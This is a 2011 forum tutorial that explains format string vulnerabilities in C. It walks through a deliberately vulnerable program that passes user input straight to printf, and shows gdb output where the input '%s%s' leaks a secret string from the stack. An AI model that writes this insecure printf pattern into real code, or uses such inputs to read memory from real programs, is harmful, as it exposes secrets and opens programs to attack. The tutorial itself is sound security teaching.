Understanding Format Strings and Their Vulnerbilities

Contributed by lionaneesh () On 3rd February, 2011

This is an article on Understanding Format Strings and Their Vulnerbilities in C.

Rated 5.00 By 1 users

Format strings are the strings mainly associated with printf's set of instructions (like printf,fprintf etc..) which basically stands for print format.... These functions accept several arguments and put them on the stack..and as a format specifier is noted in the string the function pops the data from the stack and shows it at that position....eg:-

In the following call

Code:

printf(“Aneesh is %s”,string)

The stack would look like

Code:

==========
Aneesh is %s
==========
string
==========
Other variables
==========
garbage
=========

SO what the function basically does is that as it finds a format string specifier it just simply pops the value from the stack and display's us in the format we specified..

This intern is a vulnerability if not used properly..

Format String Vulnerabilities

In this article we'll be only looking at basic format string vulnerabilities ... We'll only be covering how to read data of the stack...

The vulnerable program we are using :-

format.c

Code:

#include<stdio.h>

int main(int argc,char *argv[])
{
	char pass[] = "I am a secret .... Please dont print me..!!\n";
	printf(argv[1]);
	return(0);
}

Compiling :-

Code:

aneesh@aneesh-laptop:~/articles/C$ gcc format.c -o format -ggdb -fno-stack-protector

format.c: In function ‘main’:

format.c:6: warning: format not a string literal and no format arguments

GCC being very intelligent tells us not to use this....but then also there are some softwares that contain these kind of vulnerabilities...

Now lets run the program with basic format string :-

Code:

aneesh@aneesh-laptop:~/articles/C$ ./format Hello

Helloaneesh@aneesh-laptop:~/articles/C$

It simply prints out hello...

Now lets open the app in gdb and examine the stack...

Code:

aneesh@aneesh-laptop:~/articles/C$ gdb ./format

GNU gdb (GDB) 7.1-ubuntu

Copyright (C) 2010 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.  Type "show copying"

and "show warranty" for details.

This GDB was configured as "i486-linux-gnu".

For bug reporting instructions, please see:

<http://www.gnu.org/software/gdb/bugs/>...

Reading symbols from /home/aneesh/articles/C/format...done.

(gdb)

List the program

Code:

(gdb) list
1	#include<stdio.h>
2	
3	int main(int argc,char *argv[])
4	{
5		char pass[] = "I am a secret .... Please dont print me..!!\n";
6		printf(argv[1]);
7		return(0);
8	}
(gdb)

Place a break point at the start of main

Code:

(gdb) break main

Breakpoint 1 at 0x80483ed: file format.c, line 5.

Run the program with some sample string...

Code:

(gdb) run hello

Starting program: /home/aneesh/articles/C/format hello

Breakpoint 1, main (argc=2, argv=0xbffff4e4) at format.c:5

5		char pass[] = "I am a secret .... Please dont print me..!!\n";

(gdb) s

6		printf(argv[1]);

(gdb)

Examine the data at the stack

Code:

(gdb) x/2s $esp

0xbffff3f0:	 "\364?("

0xbffff3f4:	 "\364\237\004\b\b\364\377\277\350\202\004\b0\340\021I am a secret .... Please dont print me..!!\n"

We notice that we can read the contents of the secret by popping the stack 2 times with %s

Lets do this and check our solution...

Code:

(gdb) run %s%s

Starting program: /home/aneesh/articles/C/format %s%s

Breakpoint 1, main (argc=2, argv=0xbffff4f4) at format.c:5

5		char pass[] = "I am a secret .... Please dont print me..!!\n";

(gdb) s

6		printf(argv[1]);

(gdb) s

 ???#a secret .... Please dont print me..!!

7		return(0);

Boom we printed the secret...

Thats all for this tutorial may be i'll write some more on format string ... like reading memory from desired address...

lionaneesh Invasive contributor
8Feb2011,13:37	#2
	Thanks for accepting.. The best the viewers can do is to post some comments...as feedback... Really need them!!!